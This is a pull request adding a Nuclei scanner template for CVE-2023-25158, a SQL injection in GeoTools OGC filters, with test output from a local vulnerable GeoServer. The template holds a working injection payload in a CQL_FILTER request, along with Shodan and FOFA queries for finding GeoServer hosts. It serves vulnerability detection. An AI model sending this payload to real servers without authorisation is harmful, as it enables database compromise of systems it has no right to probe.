### PR TITLE
Add CVE-2023-25158 GeoTools OGC Filter SQL Injection template

### DIFF
--- a/http/cves/2023/CVE-2023-25158.yaml
+++ b/http/cves/2023/CVE-2023-25158.yaml
@@ -1,0 +1,61 @@
+id: CVE-2023-25158
+
+info:
+  name: GeoTools OGC Filter - SQL Injection
+  author: princechaddha
+  severity: critical
+  description: |
+    GeoTools library versions prior to 27.4 and 28.2 are vulnerable to SQL injection via OGC Filter expressions in JDBCDataStore implementations. Attackers can execute arbitrary SQL commands through malicious filter expressions such as strStartsWith, strEndsWith, PropertyIsLike, or FeatureId filters.
+  reference:
+    - https://github.com/projectdiscovery/nuclei-templates/issues/13933
+    - https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158
+    - https://github.com/geotools/geotools/security/advisories/GHSA-99c3-qc2q-p94m
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-25158
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-25158
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.title:"GeoServer"
+    fofa-query: title="GeoServer"
+  tags: cve,cve2023,geotools,geoserver,sqli,owasp-top10
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=sf:bugsites&CQL_FILTER=strStartsWith(name,'x'')+%3D+true+and+1%3D(SELECT+CAST((SELECT+version())+AS+INTEGER))+--+')"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "ServiceExceptionReport"
+          - "ServiceException"
+        condition: or
+
+      - type: word
+        part: body
+        words:
+          - "ClassCastException"
+          - "strStartsWith"
+          - "PSQLException"
+          - "org.postgresql"
+          - "invalid input syntax"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+          - 400
+          - 500
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "(?:ClassCastException|PSQLException|SQLException)[^<]*"


### PR DESCRIPTION
/claim #13933

## PR Information
Added CVE-2023-25158 - GeoTools OGC Filter SQL Injection

GeoTools library versions prior to 27.4 and 28.2 are vulnerable to SQL injection via OGC Filter expressions in JDBCDataStore implementations.

## References
- https://github.com/geotools/geotools/security/advisories/GHSA-99c3-qc2q-p94m
- https://nvd.nist.gov/vuln/detail/CVE-2023-25158

## Template Validation
- [x] Validated with a host running a vulnerable version (kartoza/geoserver:2.21.0)
- [x] Debug output captured

### Debug Output
```
[CVE-2023-25158] [critical] http://localhost:8080/geoserver/ows?...

Response:
<ServiceExceptionReport>
   <ServiceException>
      java.lang.ClassCastException: class org.geotools.filter.function.FilterFunction_strStartsWith 
      cannot be cast to class org.opengis.filter.Filter
   </ServiceException>
</ServiceExceptionReport>
```
